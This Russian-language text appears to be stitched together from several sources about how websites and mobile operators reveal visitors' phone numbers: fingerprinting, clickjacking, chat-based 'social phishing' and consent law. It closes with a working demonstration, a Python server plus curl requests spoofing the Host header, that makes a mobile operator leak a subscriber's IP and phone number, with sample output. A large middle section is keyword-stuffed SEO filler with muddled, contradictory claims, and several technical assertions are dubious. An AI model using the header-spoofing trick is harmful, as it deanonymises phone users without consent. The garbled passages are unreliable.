Куки исключены, браузер не сохраняет их и не хранит историю.
1. Про evercookie слышали? А про Web Fingerprint?
На хакере перечислена масса способов хранить ID на вашем компе без использования Куков и кэша, а технология Web Fingerprint позволяет хранить цифровой отпечаток компа, браузера на сервере банка: Фингерпринтинг конкретного ПК с точностью 99,24%, не спасает даже смена браузера.
Если вы — клиент банка и заходили в его интернет-банкинг, он легко может вас опознать при использовании того же браузера и того же компа.
А если у вас на мобиле установлено приложение интернет-банкинга — вы вообще под колпаком 
2. Если вы лазите по инету залогиненым в Вконтакте/Яндексе, то через backdoors в их API можно определить ваш профиль и все ваши данные.
Сайт Соцфишинг работает на этом принципе.
Сам банк тоже может использовать соцфишинг и ставить невидимый ифрейм на своё меню, и при клике вы автоматически авторизуетесь через аккаунт, например, Вконтакте. Зная ваш ID на Вконтакте, ваш телефон легко узнаётся, их базы регулярно сливаются и продаются
PS: Узнать как конкретно вас «слил» и каким образом — невозможно без исследования конкретной ситуации.
факультатив
Всё вышеперечисленное — детский лепет по сравнению с тем, какие возможности имеет Google (и, частично, Яндекс с Apple).
У всех дома стоит точка WiFi, к которой коннектится ваш комп и мобильник с Андроид. Через мобильник Гугл знает все номера телефонов, которые подключаются к этой точке доступа (и все аккаунты соцсетей в которые вы логинились с мобильника). Поэтому когда вы лезете Хромом с компа через эту же точку доступа — Гугль уже знает, что это вы (или один из ваших домочадцев). По GPS на мобильнике он знает даже адрес вашего проживания с точностью до подъезда.
Так что мы все давно уже добровольно «чипованы», чего удивляться что о нас всё известно.
Сталкивались ли Вы с таким, что в поисках чего-либо в интернете Вам вдруг неожиданно звонит менеджер одного из сайтов и озвучивает выгодное предложение? Вау! а как они узнали мой телефон?! Я не оставлял заявку. Интернет уже давно не анонимен. До этого момента такие функции были доступны, пожалуй, только интернет провайдерам, крупному бизнесу, банкам, социальным сетям и силовым структурам. Но теперь даже самый обычный человек может связаться с Вами в любое время суток. Все что необходимо для этого – номер телефона, который, к тому же, можно указать в своем профиле на каком-нибудь сайте. Это не новость, это реальность. Теперь, чтобы связаться с человеком, достаточно просто знать его телефон. И не важно, где он сейчас находится. Человек может быть за тысячи километров от Вас. А Вы можете быть на другом конце планеты. Но, как говорится, «звоночек» не заставит себя долго ждать. Идентификация посетителя сайта по его номеру. Какие сервисы собирают информацию о пользователях. Как отслеживать посетителей сайта по номеру телефона. Получение информации о клиентах сайта. Какой сервис позволяет отследить посетителя пришедшего на сайт по номеру мобильного телефона. Программный комплекс для определения посетителя сайта. Просмотр посетителей сайта и их номеров телефонов. Кто посещал сайт из посетителей. Как посмотреть кто был на сайте до тебя. Как найти человека по номеру его телефона. Что такое идентификаторы посетителей сайтов и как их можно отследить. Как отслеживать клиентов по номеру мобильного телефона. Определение клиентов сайта по их номеру. Как собирать информацию о посетителях сайтов. Как определить посетителя по номеру и получить его данные. Как узнать, что посетитель зашел на сайт через сервис «Яндекс.Метрика». Как отследить посетителей по телефону. Определение номеров, с которых заходили на сайт. Как найти номер телефона по IP-адресу.
Как отслеживать посетителей сайта по номеру телефона. Получение информации о клиентах сайта. Определение номера телефона, с которого был совершен звонок. Существует множество сервисов с помощью которых можно отследить посетителей сайта или определить номер телефона, который был использован для входа на сайт. Давайте рассмотрим несколько наиболее популярных и эффективных из них:
И вот тут-то, если вы не будете знать, кто эти люди, то вы можете упустить из виду очень важный момент. Ведь они могут быть потенциальными клиентами.
В современном мире, когда все больше и больше людей становятся зависимыми от интернета, сложно представить себе человека, который не пользуется сетью. На сегодняшний день, практически каждый имеет свой собственный аккаунт в социальных сетях, для того чтобы общаться с друзьями, узнавать полезную информацию, делиться фотографиями и многое другое.
В настоящее время существует множество сервисов для сбора информации о посетителях сайта. Некоторые из них, например, Яндекс Метрика, позволяют отслеживать посетителей, узнавать их ID, а также получать информацию об их действиях на сайте. Определение контактов посетителей сайта. Узнать номер телефона посетителя сайта. Захват пользователей на сайте. Узнать номер телефона кто заходил на сайт. Идентификация посетителей сайтов сервисы. Но, как правило, данные, которые можно получить таким образом, носят достаточно общий характер и не дают возможности идентифицировать посетителя сайта и по возможности узнать его телефон и другие данные.
Но это не значит что на этих сайтах можно узнать номер мобильного телефона пользователя. Дело в том, что эти сервисы работают только с доменами, а не с IP адресами. Но узнать телефонный номер с которого звонят или с которого отправляют смс, можно. Узнать номера телефонов посетителей вашего сайта, которые заходили к вам на сайт (в том числе и тех, кто был зарегистрирован на этом сайте) можно с помощью сервиса.
Как сайты интернет-магазинов узнают телефоны посетителей?
25 марта, 2020
Кликджекинг — обманная технология, основанная на размещении вызывающих какие-то действия невидимых элементов на сайте поверх видимых активных (кнопки, воспроизведение видео и т. д.). В результате пользователь, сам того не зная, совершает что-то, что не входило в его планы. Как это работает? Вы заходите на сайт, водите по нему курсором. А за вашим курсором незаметно летает невидимая ссылка авторизации в социальной сети. Рано или поздно, Вы щелкаете по ней (чтобы полистать сайт или закрыть страницу) и невидимая ссылка авторизует Вас в соцсети. Получив данные социального профиля система подставляет к ним номер телефона и адрес электронной почты из API социальной сети или внешней базы данных. В настоящее время кликджекинг является запрещенной технологией. Сайты, на которых она используется, автоматически блокируются поисковиками или понижаются в рейтинге.
Соцфишинг — технология, которая развила кликджекинг на несколько ином уровне. Соцфишинг работает в качестве формы обратной связи или чата на сайте. Вы заходите не интернет-сайт и на нем появляется чат. Чат перекидывает (редиректит) Вас на страницу начала диалога в социальной сети. Затем специальный бот фиксирует Ваш заход в чат и опознает Вас по идентификационному номеру соцсети. После этого система, как и в кликджекинге, находит номер телефона или email для связи.
Анализ файлов cookie. Cookie — небольшой фрагмент данных, отправленный веб-сервером и хранимый на компьютере пользователя. Cookie применяются для аутентификации пользователя, хранения его персональных данных, отслеживания сеанса и сбора статистики. Особенностью их является также то, что перехватить их не представляет никакого труда. Соответственно и технология идентификации работает примерно следующим образом: интернет-сайт перехватывает сookie-файлы посетителя, а затем пробует авторизоваться по ним в социальных сетях или на сервисах электронной почты. Если авторизация возможна, то у нас в руках оказываются контакты посетителя.
Своими действиями спамеры могут нарушать сразу три закона: о связи, о рекламе и о персональных данных. За эти нарушения предусмотрена административная ответственность. Реклама по телефону допускается только с вашего согласия. Если это правило не было соблюдено, то Вам необходимо подать жалобу на сайте ФАС, приложив к ней аудиозапись звонка и данные о детализации звонков. Ваши персональные данные, в т. ч. номер телефона также разрешается обрабатывать только с вашего разрешения. Обрабатывать эти сведения без согласия незаконно. Жаловаться на несоблюдение этих требований следует в Роскомнадзор.
Источник:
https://youtu.be/vMru3LtJ-uo
Мир сходит с ума, но еще не поздно все исправить. Подпишись на канал SecLabnews и внеси свой вклад в предотвращение киберапокалипсиса!
Не очень законный способ собирать персональные данные, тем не менее, сложно наказать – не каждый сможет записать разговор и подать жалобу в ФАС.
В сети рассказывают о новом способе привлечения клиентов – отслеживание номеров телефонов посетителей сайтов, которые заходят на них со смартфонов. Этим, в частности, злоупотребляют компании-застройщики, которые к тому же могут отследить, из какого города заходил абонент.
Абоненты жалуются в сети – они не оставляли никаких контактных данных и не давали согласия на звонок, тем не менее, получают массовые звонки с рекламными предложениями. Эксперимент повторили журналисты «Известий», которые получили десятки звонков, лишь просмотрев несколько сайтов из рекламы в сети Facebook.
Конечно, сами компании-рекламодатели технически не имеют возможностей отслеживать номера телефонов – но вообще такие технологии существуют, и их продают соответствующие компании. Выглядит это как вставка определенного элемента в исходный код страницы.
Использование соцсетей еще сильнее упрощает задачу: рекламодатели могут гибко настроить таргетированную рекламу, и при звонке уже знать основные данные о человеке и его интересы.
Услуги по «фиксации номера посетителей» предлагают десятки сервисов в сети. За каждый номер они просят 33 рубля, первые 10 номеров обычно идут бесплатно. По информации на сайтах таких сервисов, отследить удается номера до 80% посетителей сайтов.
Что интересно, после посещения сайта такого сервиса можно получить звонок уже от него – буквально через несколько минут (что служит подтверждением эффективности предложения). Представители сервисов уверяют, что имеют даже лицензии от Роскомнадзора, чем в ведомстве были весьма удивлены. Но пообщаться с ними еще не получается, они используют виртуальные АТС.
На данный момент такими технологиями пользуются лишь там, где доход от одного клиента высокий (в силу дороговизны услуг от таких сервисов), но в будущем, уверены эксперты, их будут использовать многие другие секторы.
Юристы уверены – это является нарушением сразу двух законов, «О рекламе» и «О персональных данных». Так, номер телефона является частью персональных данных, обработка которых допускается лишь с согласия абонента.
Что касается законодательства о рекламе, распространять ее по сетям электросвязи можно лишь с предварительного согласия абонента. Иначе рекламодателю грозит штраф в сумме от 100 до 500 тысяч рублей. Но наказать их сложно, для этого нужно составить заявление и приложить к нему аудиозапись разговора.
Система глубокого анализа трафика настроена так, что добавляет служебные HTTP-заголовки при выполнении HTTP-запроса на сайты (хосты) из списка, определяемого оператором. В заголовках может содержаться внутренний IP-адрес абонента, номер телефона (MSISDN), IMEI и IMSI-идентификаторы, идентификатор базовой станции (вышки), к которой подключен абонент (ECI/TAC).
Нам потребуется установить на сервер в интернете простой HTTP-сервер, который будет принимать запрос, показывать его на экране, и отправлять HTTP-ответ. Что-то вроде этого:
#!/usr/bin/env python3
import socketserver
class MyTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
while True:
r = self.request.recv(8192)
if b"rnrn" in r or b"nn" in r:
break
if not r:
return
print("-----rn" + r.decode() + "-----")
self.request.sendall(b"HTTP/1.1 200 OKrnContent-Length: 2rnrn")
self.request.sendall(b"OK")
return
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 80
socketserver.ForkingTCPServer.allow_reuse_address = True
server = socketserver.ForkingTCPServer((HOST, PORT), MyTCPHandler)
server.allow_reuse_address = True
server.serve_forever()
Отправим HTTP-запрос, используя SIM-карту Мегафон:
$ curl myserver.com
OK
На сервер пришло:
GET / HTTP/1.1
Host: myserver.com
User-Agent: curl/7.51.0
Accept: */*
Ничего необычного. Изменим заголовок Host на какой-нибудь внутренний домен оператора, например, на основной сайт megafon.ru:
$ curl myserver.com -H "Host: megafon.ru"
На сервере:
GET / HTTP/1.1
Host: megafon.ru
User-Agent: curl/7.51.0
Accept: */*
X-Real-IP: 100.114.20.123
X-NOKIA-MSISDN: 79319350195
На сервер пришли не только HTTP-заголовки, отправленные curl, но и дополнительные заголовки X-Real-IP и X-NOKIA-MSISDN, содержащие внутренний IP-адрес (за Carrier-grade NAT) и номер телефона!
Почему так получилось? По всей видимости, при составлении списка забыли привязать конкретные домены к конкретным IP-адресам или диапазонам, и проверка открытия сайта из листа выполняется только сравнением HTTP-заголовка Host.
Источник(там намного больше тонкостей, например, перечень внутренних доменов): https://habrahabr.ru/post/345852/
P.S.: не стоит забывать, что это именно уязвимость, то есть это ошибка в системах мобильных операторов, вполне возможно, что скоро эту дырку закроют.
P.S.P.S.: мтс данную уязвимость исправил.